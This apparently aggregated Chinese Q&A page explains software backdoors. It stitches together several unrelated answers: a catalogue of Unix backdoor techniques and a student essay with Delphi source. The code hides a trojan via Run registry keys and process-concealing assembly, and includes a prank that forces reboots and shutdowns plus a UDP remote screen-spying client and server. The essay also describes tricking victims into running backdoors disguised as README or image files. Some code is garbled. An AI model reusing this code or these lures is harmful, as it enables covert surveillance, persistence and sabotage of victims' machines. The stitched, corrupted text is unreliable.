ftp后门是什么

㈠ 漏洞，后门是什么意思/

漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说，比如在Intel Pentium芯片中存在的逻辑错误，在Sendmail早期版本中的编程错误，在NFS协议中认证方式上的弱点，在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用，威胁到系统的安全。因而这些都可以认为是系统中存在的安全漏洞。

漏洞与具体系统环境之间的关系及其时间相关特性

漏洞会影响到很大范围的软硬件设备，包括作系统本身及其支撑软件，网络客户和服务器软件，网络路由器和安全防火墙等。换而言之，在这些不同的软硬件设备中都可能存在不同的安全漏洞问题。在不同种类的软、硬件设备，同种设备的不同版本之间，由不同设备构成的不同系统之间，以及同种系统在不同的设置条件下，都会存在各自不同的安全漏洞问题。

漏洞问题是与时间紧密相关的。一个系统从发布的那一天起，随着用户的深入使用，系统中存在的漏洞会被不断暴露出来，这些早先被发现的漏洞也会不断被系统供应商发布的补丁软件修补，或在以后发布的新版系统中得以纠正。而在新版系统纠正了旧版本中具有漏洞的同时，也会引入一些新的漏洞和错误。因而随着时间的推移，旧的漏洞会不断消失，新的漏洞会不断出现。漏洞问题也会长期存在。

因而脱离具体的时间和具体的系统环境来讨论漏洞问题是毫无意义的。只能针对目标系统的作系统版本、其上运行的软件版本以及服务运行设置等实际环境来具体谈论其中可能存在的漏洞及其可行的解决办法。

同时应该看到，对漏洞问题的研究必须要跟踪当前最新的计算机系统及其安全问题的最新发展动态。这一点如同对计算机病毒发展问题的研究相似。如果在工作中不能保持对新技术的跟踪，就没有谈论系统安全漏洞问题的发言权，即使是以前所作的工作也会逐渐失去价值。

二、漏洞问题与不同安全级别计算机系统之间的关系

目前计算机系统安全的分级标准一般都是依据“橘皮书”中的定义。橘皮书正式名称是“受信任计算机系统评量基准”（Trusted Computer System Evaluation Criteria)。橘皮书中对可信任系统的定义是这样的：一个由完整的硬件及软件所组成的系统，在不违反访问权限的情况下，它能同时服务于不限定个数的用户，并处理从一般机密到最高机密等不同范围的信息。

橘皮书将一个计算机系统可接受的信任程度加以分级,凡符合某些安全条件、基准规则的系统即可归类为某种安全等级。橘皮书将计算机系统的安全性能由高而低划分为A、B、C、D四大等级。其中：

D级——最低保护（Minimal Protection)，凡没有通过其他安全等级测试项目的系统即属于该级，如Dos，Windows个人计算机系统。

C级——自主访问控制（Discretionary Protection)，该等级的安全特点在于系统的客体（如文件、目录）可由该系统主体（如系统管理员、用户、应用程序）自主定义访问权。例如：管理员可以决定系统中任意文件的权限。当前Unix、Linux、Windows NT等作系统都为此安全等级。

B级——强制访问控制（Mandatory Protection)，该等级的安全特点在于由系统强制对客体进行安全保护，在该级安全系统中，每个系统客体（如文件、目录等资源）及主体（如系统管理员、用户、应用程序）都有自己的安全标签（Security Label），系统依据用户的安全等级赋予其对各个对象的访问权限。

A级——可验证访问控制（Verified Protection)，而其特点在于该等级的系统拥有正式的分析及数学式方法可完全证明该系统的安全策略及安全规格的完整性与一致性。 '

可见，根据定义，系统的安全级别越高，理论上该系统也越安全。可以说，系统安全级别是一种理论上的安全保证机制。是指在正常情况下，在某个系统根据理论得以正确实现时，系统应该可以达到的安全程度。

系统安全漏洞是指可以用来对系统安全造成危害，系统本身具有的，或设置上存在的缺陷。总之，漏洞是系统在具体实现中的错误。比如在建立安全机制中规划考虑上的缺陷，作系统和其他软件编程中的错误，以及在使用该系统提供的安全机制时人为的配置错误等。

安全漏洞的出现，是因为人们在对安全机制理论的具体实现中发生了错误，是意外出现的非正常情况。而在一切由人类实现的系统中都会不同程度的存在实现和设置上的各种潜在错误。因而在所有系统中必定存在某些安全漏洞，无论这些漏洞是否已被发现，也无论该系统的理论安全级别如何。

所以可以认为，在一定程度上，安全漏洞问题是独立于作系统本身的理论安全级别而存在的。并不是说，系统所属的安全级别越高，该系统中存在的安全漏洞就越少。

可以这么理解，当系统中存在的某些漏洞被入侵者利用，使入侵者得以绕过系统中的一部分安全机制并获得对系统一定程度的访问权限后，在安全性较高的系统当中，入侵者如果希望进一步获得特权或对系统造成较大的破坏，必须要克服更大的障碍。

三、安全漏洞与系统攻击之间的关系

系统安全漏洞是在系统具体实现和具体使用中产生的错误，但并不是系统中存在的错误都是安全漏洞。只有能威胁到系统安全的错误才是漏洞。许多错误在通常情况下并不会对系统安全造成危害，只有被人在某些条件下故意使用时才会影响系统安全。

漏洞虽然可能最初就存在于系统当中，但一个漏洞并不是自己出现的，必须要有人发现。在实际使用中，用户会发现系统中存在错误，而入侵者会有意利用其中的某些错误并使其成为威胁系统安全的工具，这时人们会认识到这个错误是一个系统安全漏洞。系统供应商会尽快发布针对这个漏洞的补丁程序，纠正这个错误。这就是系统安全漏洞从被发现到被纠正的一般过程。

系统攻击者往往是安全漏洞的发现者和使用者，要对于一个系统进行攻击，如果不能发现和使用系统中存在的安全漏洞是不可能成功的。对于安全级别较高的系统尤其如此。

系统安全漏洞与系统攻击活动之间有紧密的关系。因而不该脱离系统攻击活动来谈论安全漏洞问题。了解常见的系统攻击方法，对于有针对性的理解系统漏洞问题，以及找到相应的补救方法是十分必要的。

四、常见攻击方法与攻击过程的简单描述

系统攻击是指某人非法使用或破坏某一信息系统中的资源，以及非授权使系统丧失部分或全部服务功能的行为。

通常可以把攻击活动大致分为远程攻击和内部攻击两种。现在随着互联网络的进步，其中的远程攻击技术得到很大发展，威胁也越来越大，而其中涉及的系统漏洞以及相关的知识也较多，因此有重要的研究价值。

㈡ 黑客中说的后门什么意思

一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。
密码破解后门
这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。
Rhosts + + 后门
在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力。许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。
校验和及时间戳后门
早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。
Login后门
在Unix里，login程序通常用来对telnet来的用户进行口令验证。 入侵者获取login.c的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便用"strings"命令搜索login程序以寻找文本信息。 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效。 所以更多的管理员是用MD5校验和检测这种后门的。
Telnetd后门
当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端。典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产生一个shell。
服务后门
几乎所有网络服务曾被入侵者作过后门。 Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。
库后门
几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题： 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。
内核后门
内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别。一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，""，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞： 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。
Boot块后门
在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。
隐匿进程后门
入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序(sniffer)，有许多办法可以实现，这里是较通用的： 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此当管理员用"ps"检查运行进程时，出现 的是标准服务名。可以修改库函数致使"ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是
amod.tar.gz :
网络通行。这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问。 因为这是通过非标准网络端口的通行，管理员可能忽视入侵者的足迹。 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。
TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问。 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉。 通常这些后门可以让入侵者躲过TCP Wrapper技术。这些后门可以放在SMTP端口，许多防火墙允许 e-mail通行的.
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。
加密连接
管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。

㈢ 什么是后门

后门是一个多义词，意思分别有：

1、后门是指一座建筑背面开设的门，通常比较隐蔽，为进出建筑的人提供方便和隐蔽。

㈣ 装系统中的后门是什么起什么作用有什么有利和有害的如何弄

系统后门一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。

创建过程：在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。

利弊：使再次侵入被发现的可能性减至最低。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

作用：使系统管理员无法阻止种植者再次进入系统：使种植者在系统中不易被发现：使种植者进入系统花最少时间。

(4)ftp后门是什么扩展阅读

早期的电脑黑客，在成功获得远程系统的控制权后，希望能有一种技术使得他们在任意的时间都可以再次进入远程系统，于是后门程序就出现了。

后门程序跟我们通常所说的“木马”有联系也有区别。联系在于，都是隐藏在用户系统中向外发送信息，而且本身具有一定权限，以便远程机器对本机的控制；区别在于，木马是一个非常完整的工具集合，而后门则体积较小且功能都很单一，所以木马提供的功能远远超过后门程序。

㈤ 电脑后门是什么意思

电脑后门是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。

在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

后门程序不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。而且在病毒命名中，后门一般带有backdoor字样，而木马一般则是Trojan字样。

着名后门

最着名的后门程序，该算是微软的Windows Update了。Windows Update的动作不外乎以下三个：开机时自动连上微软的网站，将电脑的现况报告给网站以进行处理，网站通过Windows Update程序通知使用者是否有必须更新的文件，以及如何更新。

如果针对这些动作进行分析，则“开机时自动连上微软网站”的动作就是后门程序特性中的“潜伏”，而“将电脑现况报告”的动作是“搜集信息”。

因此，虽然微软“信誓旦旦”地说它不会搜集个人电脑中的信息，但如果我们从Windows Update来进行分析的话，就会发现它必须搜集个人电脑的信息才能进行操作，所差者只是搜集了哪些信息而已。

㈥ 电脑网络中的“后门”是什么意思

电脑网络中的“后门”即是网络的漏洞

一、问题的提出
"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."这是着名匿名服务器站点Anonymizer上曾有过的一段话。是的，在不知不觉中，E时代已经到来，网络给我们的生活增添了绚丽与多彩。但是，在这五彩缤纷的世界下面，潜伏着一股黑潮暗流--黑客（HACKER）。这个名词越来越引起世人的关注，而且影响越来越大，关于黑客事件的报道也越来越多。黑客是伴随网络产生成长的，是指那些对电脑和网络有狂热兴趣的人，他们不断的研究电脑和网络知识，发现电脑和网络中的漏洞，喜欢挑战高难度的网络系统，千方百计的寻找网络中的大小漏洞，然后向网络管理员提出解决漏洞的建议。真正的黑客大多是赋有正义感的。他们不会恶意侵入他人系统，并且破坏系统程序和数据。但有一些人特别崇拜黑客，喜欢利用电脑网络四处捣乱，到处寻找黑客软件，然后到处搞破坏，这类人应该是网络上最危险的家伙。现在的媒体把这类人是黑客混为一谈，"黑客"一词也因此成了贬义词。
现在的黑客软件十分多，Back Orific、冰河、YAI到处都有。接触网络后，我经常想：黑客软件到底是如何编制的？我能编一个黑客软件多好呀！这到不是想干坏事，因为在网络机房上课时，用一些黑客软件可以作为控制工具来控制学员的机器（如：冰河）。可见黑客软件本身不象病毒是个不好的东西，是可以用在正路上的。经过我的摸索，初步掌握了一些设计方法，主要是特洛伊木马程序。本次毕业设计，我设计一个模拟黑客入侵程序，一个恶作剧程序，一个可以截获网络上别人在机器上干些什么的程序，几个程序纯属用于实验，没有什么其它目的。在这里向各位老师汇报一下。程序设计的语言用的是PASCAL，用DELPHI 4进行编译。

二、"特洛伊木马"如何入侵系统
一个完整的"特洛伊木马"一般分为两个部分：一个是客户服务程序（Client），用它来控制已经打开"后门"的机器；另一个是"后门"程序，用它来开放某台机器。假设我们想控制某台电脑，那么我们通过一些手段来把"后门"程序传到该电脑中并使其运行，这样该电脑就变成了一台特殊的FTP服务器。然后我们使用Client程序就可以控制该电脑了。当然，后门程序如果不运行也就无法发挥作用。因此，就要"诱骗"别人使用后门程序。如果是朋友或熟人，利用他们的信任让他运行就行了；要是陌生人，可以在聊天室中和他们套近乎，一旦取得信任，把程序发给他们，诱骗其运行。当然，程序要隐蔽一些，例如可以把后门程序改名，变为README之类，或改变后缀，变成GIF、BMP等，当他们双击这些文件后就上了"贼船"了。也可以用WINZIP的把后门程序和一些东西制作成一个自解压包，然后利用设定解压后自动运行SETUP程序功能来运行指定的后门程序。总之，要利用一切手段使人家运行后门程序。
木马程序运行后，会通过不同的方式修改系统，以便以后启动系统后自动运行木马。修改方法一般是通过修改注册表：
Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和
Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的项目是在系统开机时自动加载的，我们可以在这两添加键值，达到自动启动的目的。以下的这段代码可以修改注册表，并调用API函数判断系统目录，复制文件到其下，以实行入侵系统的目的：

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls,registry;
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procere Button1Click(Sender: TObject);
procere Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.DFM}

procere TForm1.Button1Click(Sender: TObject);
var
regf:tregistry;
sysdir:pchar;
temp:string;
begin
getmem(sysdir,256);
getsystemdirectory(sysdir,128);
temp:=sysdir+'\client.exe';
freemem(sysdir,256);
regf:=tregistry.create;
regf.rootkey:=hkey_local_machine;
regf.openkey('software\microsoft\windows\currentversion\run',true);
regf.writestring(' ',temp);
regf.free;
file(pchar('hacker.exe'),pchar(temp),true);
end;

procere TForm1.Button2Click(Sender: TObject);
begin
close;
end;
end.

也有些高明的程序可以感染系统文件，附着在这些程序文件中，以达到其目的。我还没有搞清楚这是怎样办到的。
在Windows中按下Ctrl+Alt+Del可以显示当前运行的程序，这样一来，我们的木马程序不是要露馅了吗？以下这段汇编代码可以很方便的嵌入DELPHI或C++中，让别人看不到你的程序，可以很好的隐藏：
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
为什么这段汇编代码可以隐藏程序呢？据资料分析：在WINDOWS 9X加载应用程序时，FS指向的段就是类似于DOS应用程序的PSP，里面保存着一些有关应用程序重要数据，按下Ctrl+Alt+Del后，对于一个应用程序，若没有可显示的ENABLE窗口的名字，则系统要检查上面程序段中的特定双字是不是10800000h，如果是就不显示这个应用程序的可执行文件的名字。
下面是一个恶作剧的程序，入侵计算机后，每次开机后，随机出现鼠标乱跑并发出怪叫、热启动、强行关机的现象，让你无法进入WINDOWS 9X。对于一般的计算机用户来说，因为找不出这个程序在何处，所以只能格式化系统区，重新安装系统。

program hacker;
uses
windows;
var temp:integer;
begin
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
randomize;
temp:=random(3);
if temp=0 then
while(true) do
begin
messagebeep(0);
SetCursorPos (random(640),random(480));
end
else if temp=1 then
ExitWindowsEx(EWX_REBOOT,0)
else ExitWindowsEx(EWX_SHUTDOWN,0);
end.

有的木马为了防止发现后被清除，在启动时会产生一个备份，一般是感染WINDOWS的系统文件，当木马被发现并清除后，备份会自动激活，使你依然处于远程黑手的控制。比如当前国最盛行的"冰河"，首先会修改注册表的启动项目，将自己复制两份到系统中，分别为KERNEL32.EXE和SYSEXPLE.EXE，并且修改TXT文件的打开方式，一旦KERNEL32.EXE被删除，那么当打开一个TXT文件时，SYSEXPLE.EXE将再产生一个KERNEL32.EXE文件。
另外，有的木马还能在运行后修改文件名，或者复制感染系统后，进行自我销毁，使用户很难进行查找。

三、木马的种类
1、破坏型
惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL、INI、EXE文件。
2、密码发送型
可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些黑客软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。
在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API函数EnumWindows和EnumChildWindows对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送WM_COMMAND消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。
3、远程访问型
最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。
程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。

受控机程序部分：
让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的ONDATARECEIVED事件；REMOTEPORT属性设为2222，当控件CUDP发送数据时，将数据发送到主控机的2222口。

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
NMUDP, ComCtrls;

type
Tclient = class(TForm)
cudp: TNMUDP;
Animate1: TAnimate;
procere FormCreate(Sender: TObject);
procere FormDestroy(Sender: TObject);
procere cudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;

var
client: Tclient;

implementation
const bufsize=2048;//发送每一批数据的缓冲区大小
var
bmpstream:tmemorystream;
leftsize:longint;
{$R *.DFM}

procere screencap(leftpos,toppos,rightpos,bottompos:integer);
var
recwidth,recheight:integer;
sourcedc,destdc,bhandle:integer;
bitmap:Tbitmap;
begin
recwidth:=rightpos-leftpos;
recheight:=bottompos-toppos;
sourcedc:=createdc('display','','',nil);
destdc:=createcompatibledc(sourcedc);
bhandle:=createcompatiblebitmap(sourcedc,recwidth,recheight);
selectobject(destdc,bhandle);
bitblt(destdc,0,0,recwidth,recheight,sourcedc,leftpos,toppos,src);
bitmap:=tbitmap.Create;
bitmap.Handle:=bhandle;
bitmap.SaveToStream(bmpstream);
bmpstream.Position:=0;
leftsize:=bmpstream.Size;
bitmap.Free;
deletedc(destdc);
releasedc(bhandle,sourcedc);
end;

procere Tclient.FormCreate(Sender: TObject);
begin
bmpstream:=tmemorystream.create;
end;

procere Tclient.FormDestroy(Sender: TObject);
begin
bmpstream.free;
end;

procere Tclient.cudpDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
ctrlcode:array[0..29] of char;
buf:array[0..bufsize-1] of char;
tmpstr:string;
sendsize,leftpos,toppos,rightpos,bottompos:integer;
begin
cudp.ReadBuffer(ctrlcode,numberbytes);//读取控制码
if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'
then
begin//控制码前4位为"SHOW"表示主控机发出了截屏指令
if bmpstream.Size=0 then//没有数据可发，必须截屏生成数据
begin tmpstr:=strpas(ctrlcode);
tmpstr:=(tmpstr,5,length(tmpstr)-4);
leftpos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
toppos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
rightpos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
bottompos:=strtoint((tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));
screencap(leftpos,toppos,rightpos,bottompos);//调用截屏函数
end;
if leftsize>bufsize then sendsize:=bufsize
else sendsize:=leftsize;
bmpstream.ReadBuffer(buf,sendsize);
leftsize:=leftsize-sendsize;
if leftsize=0 then bmpstream.Clear;
cudp.RemoteHost:=fromip;//FROMIP为主控机IP地址
cudp.SendBuffer(buf,sendsize);//将数据发到主控机的2222端口
end;
end;
end.

主控机程序部分：
让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发SUDP的ONDATARECEIVED事件；REMOTEPORT属性设为1111，当控件SUDP发送数据时，将数据发到受控机的1111口。

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ExtCtrls, StdCtrls, Buttons, NMUDP;

type
Tsever = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Label1: TLabel;
Label2: TLabel;
BitBtn1: TBitBtn;
Image1: TImage;
BitBtn2: TBitBtn;
sudp: TNMUDP;
procere BitBtn2Click(Sender: TObject);
procere FormCreate(Sender: TObject);
procere FormDestroy(Sender: TObject);
procere BitBtn1Click(Sender: TObject);
procere sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;

var
sever: Tsever;

implementation
const bufsize=2048;
var
rsltstream,tmpstream:tmemorystream;
{$R *.DFM}

procere Tsever.BitBtn2Click(Sender: TObject);
begin
close;
end;

procere Tsever.FormCreate(Sender: TObject);
begin
rsltstream:=tmemorystream.create;
tmpstream:=tmemorystream.create;
end;

procere Tsever.FormDestroy(Sender: TObject);
begin
rsltstream.free;
tmpstream.free;
end;

procere Tsever.BitBtn1Click(Sender: TObject);
var
reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strp(reqcode,reqcodestr);
tmpstream.Clear;
rsltstream.Clear;
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;

procere Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
var reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strp(reqcode,reqcodestr);
sudp.ReadStream(tmpstream);
rsltstream.CopyFrom(tmpstream,numberbytes);
if numberbytes<bufsize then
begin
rsltstream.Position:=0;
image1.Picture.Bitmap.LoadFromStream(rsltstream);
tmpstream.Clear;
rsltstream.Clear;
end
else
begin
tmpstream.Clear;
reqcode:='show';
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;
end;
end.

四、如何预防黑客
黑客程序虽然破坏大，但不是不能防止的。
1、处理好你的密码
我们一般是用账号和密码来上网的，密码的设置无疑是十分讲求技巧的，许多人的安全防范意识差，不注意密码的设置，造成自己的账号被盗用。如今的黑客软件都是挂上密码字典，然后用穷举法进行破解，密码太简单，那么破解的可能性就大了。以下是一些注意事项。
⑴ 密码不可和账号相同，这是最容易被猜到的了。
⑵ 经常更改密码，拿到新账号后要立即更改密码，不要放久了。
⑶ 密码最好多于8个字符，字符越长，破解难度越大。例如WORD文档的密码大于8位后，目前的破解软件几乎无法攻破。另外，最好在密码中加入一些控制键，增加破译难度。千万不可用单一的字母或数字。
⑷ 有人喜欢用自己的生日、电话、身份证号码等作为密码，你不要这样做。
⑸ 密码尽量不要记显眼的纸张上，更不能保存在计算机中，不要贪图一时方便，用WINDOWS提供的保存密码功能。
2、不要运行不明真相的程序
无论都高明的黑客程序，只要你不去运行它，就无法害到你。所以，不可相信网友的话，不要去运行他提供的程序；不要随意去打开别人寄来的附件，无论他把附件中的图片或影片吹得如何好看；要到大的、着名的网站去下载软件，千万不要到不明真象的个人网页下载，因为在那儿你可能下载的病毒和黑客之手；如果你十分羡慕黑客，也请你不要下载所谓的黑客软件，否则你没害到别人，自己反被害了；如果你的机器上有防火墙，在上网时一定要打开，不要怕麻烦。
3、经常检查系统信息
上网过程中，突然觉得计算机工作不对劲时，仿佛感觉有人在遥远的地方遥控你。这时，你必须及时停止手中工作，运行"附件→系统工具→系统信息"，在任务列表中寻找自己不熟悉的或者自己并没有运行的程序，一旦找到程序后应立即终止它的运行，以防后患。
4、最好不去聊天室
我一直认为聊天室没有什么意思，特别对于计算机专业人员，聊天只是浪费时间和金钱，有些恶意的破坏者利用网上聊天室的漏洞干坏事，例如聊天室支持JAVA、HTML等功能，然而，这小小的JAVA也隐藏"杀机"，他可以发给你一个足以让你的机器当机的HTML语句。因为这些语句是不会在聊天室显示出来的，所以你被暗算了可能还不知道。防治的办法是在你的浏览器中关闭你的JAVA脚本。想聊天的，在公共机房聊聊算了，不能在自己的机器上聊天。

㈦ 网络端口技术都包括什么

你可以参考http://volf.blogchina.com/472793.html
一、端口简介

